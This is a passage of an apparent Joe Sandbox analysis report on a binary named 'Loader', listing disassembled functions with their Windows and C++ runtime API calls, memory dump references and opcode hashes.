                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00192557
                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00192562
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2081738530-0
                                                                                                                      • Opcode ID: 90a050b76b162d965ea760257da1ec0ec0487566133ab35f9e748f927da8e352
                                                                                                                      • Instruction ID: 6f021000145e2226cd7a13c92aeaf2d8bfef575c5161f193c7032ba4f3f38da2
                                                                                                                      • Opcode Fuzzy Hash: 90a050b76b162d965ea760257da1ec0ec0487566133ab35f9e748f927da8e352
                                                                                                                      • Instruction Fuzzy Hash: CF01DF32904115FBDF19AB54E8158ED7768DFA0720B120148F4159B281EF30EE46CBC0
                                                                                                                      APIs
                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0019308B
                                                                                                                      • int.LIBCPMT ref: 0019309E
                                                                                                                        • Part of subcall function 001916DA: std::_Lockit::_Lockit.LIBCPMT ref: 001916EB
                                                                                                                        • Part of subcall function 001916DA: std::_Lockit::~_Lockit.LIBCPMT ref: 00191705
                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 001930D1
                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 001930E7
                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 001930F2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2081738530-0
                                                                                                                      • Opcode ID: e454139d7e4a0e22431b12f76975df1ee3b082ef04f9dc2d1eced559fe0c4338
                                                                                                                      • Instruction ID: a79c4938e1036861c70cb90700e6d611ca33d9745e3e702e6485fd15535a10b3
                                                                                                                      • Opcode Fuzzy Hash: e454139d7e4a0e22431b12f76975df1ee3b082ef04f9dc2d1eced559fe0c4338
                                                                                                                      • Instruction Fuzzy Hash: C301A736904115BBCF19AB54D8058DDB778DF90360B154145F5255B291EF30EF81C7D0
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 00194CCD
                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00194CD8
                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00194D46
                                                                                                                        • Part of subcall function 00194E29: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00194E41
                                                                                                                      • std::locale::_Setgloballocale.LIBCPMT ref: 00194CF3
                                                                                                                      • _Yarn.LIBCPMT ref: 00194D09
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1088826258-0
                                                                                                                      • Opcode ID: ae035912c6d8a5177192b70a617e71caac863f87bc68d2044ce5b6e0a872136c
                                                                                                                      • Instruction ID: 86bc1d4191b287f2aab416022db7e2ae8be18dafdda312e61c29a7afb9323141
                                                                                                                      • Opcode Fuzzy Hash: ae035912c6d8a5177192b70a617e71caac863f87bc68d2044ce5b6e0a872136c
                                                                                                                      • Instruction Fuzzy Hash: 5D018475A001109BCB06EB60D8559BD7BB5FFA4750B154008E82157391CF34AF42CFC1
                                                                                                                      APIs
                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0019AF33,00000000,?,002150DC,?,?,?,0019B0D6,00000004,InitializeCriticalSectionEx,001B4C70,InitializeCriticalSectionEx), ref: 0019AF8F
                                                                                                                      • GetLastError.KERNEL32(?,0019AF33,00000000,?,002150DC,?,?,?,0019B0D6,00000004,InitializeCriticalSectionEx,001B4C70,InitializeCriticalSectionEx,00000000,?,0019AE8D), ref: 0019AF99
                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0019AFC1
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                                                      • String ID: api-ms-
                                                                                                                      • API String ID: 3177248105-2084034818
                                                                                                                      • Opcode ID: 4e6a6b6cc29792df9b42e5011b3cf9ea616deef17f5a47442787e256dda6a2a3
                                                                                                                      • Instruction ID: a773ee99e4314565ffbcdd94c29eb0dd7a0edf54f67d3193cd12de07fedd8f06
                                                                                                                      • Opcode Fuzzy Hash: 4e6a6b6cc29792df9b42e5011b3cf9ea616deef17f5a47442787e256dda6a2a3
                                                                                                                      • Instruction Fuzzy Hash: D7E08670684204BBEF112F72EC0AB5C3F64AF11B44F504121F90CE84E1D771DAB489C5
                                                                                                                      APIs
                                                                                                                      • GetConsoleOutputCP.KERNEL32(C0416D80,00000000,00000000,7622F550), ref: 001A57C1
                                                                                                                        • Part of subcall function 001A9815: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,001A88DA,?,00000000,-00000008), ref: 001A98C1
                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 001A5A1C
                                                                                                                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 001A5A64
                                                                                                                      • GetLastError.KERNEL32 ref: 001A5B07
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2112829910-0
                                                                                                                      • Opcode ID: 40a0872cc8a7ac2f992eae17a792d0d2eea550d39e55a1aa73910b2466ce67e8
                                                                                                                      • Instruction ID: a7195510aadb6e310c4899b6f250431b5dcb297bc215c708923e0b048c8e866c
                                                                                                                      • Opcode Fuzzy Hash: 40a0872cc8a7ac2f992eae17a792d0d2eea550d39e55a1aa73910b2466ce67e8
                                                                                                                      • Instruction Fuzzy Hash: 35D16979E046589FCB05CFA8D880AEDBBB6FF4A314F18456AE816EB351D730A941CB50
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AdjustPointer
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1740715915-0
                                                                                                                      • Opcode ID: 7d09d88b6f266dff440f03eb9a5c9d7f94ee68ffd413995a3b71e903520ef18e
                                                                                                                      • Instruction ID: 8163d3b21089687138d5515136ccc84ff93c8643e92a85db83e13d9e20d1854e
                                                                                                                      • Opcode Fuzzy Hash: 7d09d88b6f266dff440f03eb9a5c9d7f94ee68ffd413995a3b71e903520ef18e
                                                                                                                      • Instruction Fuzzy Hash: FA511572604206AFEF289F18C841BBAB7A4FF54710F58452DF905972A1E732EC98C7D2
                                                                                                                      APIs
                                                                                                                      • WriteConso.KERNEL32(00000000,00000000,?,00000000,00000000,?,001AEF79,00000000,00000001,00000000,7622F550,?,001A5B5B,7622F550,00000000,00000000), ref: 001B055D
                                                                                                                      • GetLastError.KERNEL32(?,001AEF79,00000000,00000001,00000000,7622F550,?,001A5B5B,7622F550,00000000,00000000,7622F550,7622F550,?,001A60E2,00000000), ref: 001B0569
                                                                                                                        • Part of subcall function 001B052F: CloseHandle.KERNEL32(FFFFFFFE,001B0579,?,001AEF79,00000000,00000001,00000000,7622F550,?,001A5B5B,7622F550,00000000,00000000,7622F550,7622F550), ref: 001B053F
                                                                                                                      • ___initconout.LIBCMT ref: 001B0579
                                                                                                                        • Part of subcall function 001B04F1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,001B0520,001AEF66,7622F550,?,001A5B5B,7622F550,00000000,00000000,7622F550), ref: 001B0504
                                                                                                                      • WriteConso.KERNEL32(00000000,00000000,?,00000000,?,001AEF79,00000000,00000001,00000000,7622F550,?,001A5B5B,7622F550,00000000,00000000,7622F550), ref: 001B058E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ConsoWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1327366883-0
                                                                                                                      • Opcode ID: 25cf0224bfd10f44c6c44b3ea47f15847d31251e22572f2abf3f1e457e72b2b2
                                                                                                                      • Instruction ID: e7dbcb7e6e1254848865f1ad5f568a65cb6a3c189e55c9a98c59b4ad5f245973
                                                                                                                      • Opcode Fuzzy Hash: 25cf0224bfd10f44c6c44b3ea47f15847d31251e22572f2abf3f1e457e72b2b2
                                                                                                                      • Instruction Fuzzy Hash: D3F0AC76500119BBCF232FA5EC089DA3F6AFF0D3A1B044610FA1996930C7328970DF90
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: H_prolog3_catch_strlen
                                                                                                                      • String ID: input string:
                                                                                                                      • API String ID: 3133806014-2984214493
                                                                                                                      • Opcode ID: ce736a5d45fc9bbde61dab91f933d139a14ff72c7c20b6ca41e1d06c9f1e810b
                                                                                                                      • Instruction ID: 95747a5005a0d0288be9de1bb0249a4538e63c065633a2ac9f58d3308fca5cc0
                                                                                                                      • Opcode Fuzzy Hash: ce736a5d45fc9bbde61dab91f933d139a14ff72c7c20b6ca41e1d06c9f1e810b
                                                                                                                      • Instruction Fuzzy Hash: 88411670A44215AFCF20EF58D8D4DAC77F1BF58728F2A8259E429AB2E1C7709C41CB94
                                                                                                                      APIs
                                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00199C7F
                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00199D33
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                      • String ID: csm
                                                                                                                      • API String ID: 3480331319-1018135373
                                                                                                                      • Opcode ID: c62e1604d8aeb3944590d003579256170294df35c461bf69fb1c09d7cc55555e
                                                                                                                      • Instruction ID: 5ff0679b84b7712cce948c77d201eaa845fe1190656a0ee32eb025c30326cf5d
                                                                                                                      • Opcode Fuzzy Hash: c62e1604d8aeb3944590d003579256170294df35c461bf69fb1c09d7cc55555e
                                                                                                                      • Instruction Fuzzy Hash: 21418134A00218AFCF14DFACC884A9EBBF5BF45314F148159E8199B392D731AE55CB91
                                                                                                                      APIs
                                                                                                                      • EncodePointer.KERNEL32(00000000,?), ref: 0019A572
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: EncodePointer
                                                                                                                      • String ID: MOC$RCC
                                                                                                                      • API String ID: 2118026453-2084237596
                                                                                                                      • Opcode ID: 5d45fe42a66fc1132cf195d186bcc5ec8fb0b6bf63c42121013c4d7a20d0354e
                                                                                                                      • Instruction ID: 9bc3eb1ec6530c8dda50b9ee1cb7f3dd79aae598a6f2199f190a95a60c6d68aa
                                                                                                                      • Opcode Fuzzy Hash: 5d45fe42a66fc1132cf195d186bcc5ec8fb0b6bf63c42121013c4d7a20d0354e
                                                                                                                      • Instruction Fuzzy Hash: A3419971A00209AFCF15DF98CC81AEEBBB5FF48300F598099F904A7221D3359A50CF92
                                                                                                                      APIs
                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00197213
                                                                                                                      • ___raise_securityfailure.LIBCMT ref: 001972FB
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                      • String ID: xM!
                                                                                                                      • API String ID: 3761405300-2887631340
                                                                                                                      • Opcode ID: c3c2aa9df9b9ad288e4f91124ff7703c387ffec22738c4d8e4f7489606a0c916
                                                                                                                      • Instruction ID: 3dc9bd8c48975e12e356b62edee3a0191d65846b81f5899807626978f3b8ebbf
                                                                                                                      • Opcode Fuzzy Hash: c3c2aa9df9b9ad288e4f91124ff7703c387ffec22738c4d8e4f7489606a0c916
                                                                                                                      • Instruction Fuzzy Hash: F621C2B56102019AEB04EF65F94AB903BF8BB68715F11852AE50D8B3A1EBF19980CF45
                                                                                                                      APIs
                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0019731B
                                                                                                                      • ___raise_securityfailure.LIBCMT ref: 001973D8
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                      • String ID: xM!
                                                                                                                      • API String ID: 3761405300-2887631340
                                                                                                                      • Opcode ID: 29fee64208dab47e0c24289df156984eaa6907fa4e529ae664466df7c39ce151
                                                                                                                      • Instruction ID: 781bc52f1a01f93856132eea2e42ac58a78b54b1f0192295adc12ebd4a25c895
                                                                                                                      • Opcode Fuzzy Hash: 29fee64208dab47e0c24289df156984eaa6907fa4e529ae664466df7c39ce151
                                                                                                                      • Instruction Fuzzy Hash: EF11A2B9511205DBDB00EF65F949AC03BB9BB68711F11D02AE90C8B3B1EBB09941DF85
                                                                                                                      APIs
                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0019160C
                                                                                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00191644
                                                                                                                        • Part of subcall function 00194DC4: _Yarn.LIBCPMT ref: 00194DE3
                                                                                                                        • Part of subcall function 00194DC4: _Yarn.LIBCPMT ref: 00194E07
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                      • String ID: bad locale name
                                                                                                                      • API String ID: 1908188788-1405518554
                                                                                                                      • Opcode ID: cab3e5224df8b90195cf12c47e388e0b7e7bc2501b189160113119126ce69e3b
                                                                                                                      • Instruction ID: d429224d767559da2c1457a5d8503cc03e3c1e9314cf89d1bbd2c5c8e094664d
                                                                                                                      • Opcode Fuzzy Hash: cab3e5224df8b90195cf12c47e388e0b7e7bc2501b189160113119126ce69e3b
                                                                                                                      • Instruction Fuzzy Hash: 90F030B1505B409E83359FBA8491447FBE4BE28310394CE2FE1DEC3A11D730E504CB6A
                                                                                                                      APIs
                                                                                                                      • FreeLibrary.KERNEL32(00215520), ref: 001A3A4E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeLibrary
                                                                                                                      • String ID: U!$pU!
                                                                                                                      • API String ID: 3664257935-37195876
                                                                                                                      • Opcode ID: 7a48fe372dd9c281da6a2e04c139c52e21ba5bd96fd11267518a286657643b04
                                                                                                                      • Instruction ID: 22101bdb92af8cee49fd8270dbffc0d4ad85ca31185bc87b003f0f11b39c4253
                                                                                                                      • Opcode Fuzzy Hash: 7a48fe372dd9c281da6a2e04c139c52e21ba5bd96fd11267518a286657643b04
                                                                                                                      • Instruction Fuzzy Hash: E5E04F3AC10564AADB301A18D404390B6D55B51335F55116AF4FD921E0A3711EE58680
                                                                                                                      APIs
                                                                                                                      • GetLocaleInfoW.KERNEL32(?,2000000B,001ACE1D,00000002,00000000,?,?,?,001ACE1D,?,00000000), ref: 001ACB98
                                                                                                                      • GetLocaleInfoW.KERNEL32(?,20001004,001ACE1D,00000002,00000000,?,?,?,001ACE1D,?,00000000), ref: 001ACBC1
                                                                                                                      • GetACP.KERNEL32(?,?,001ACE1D,?,00000000), ref: 001ACBD6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2143886749.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.2143871186.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143908404.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143923943.00000000001BE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143960755.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
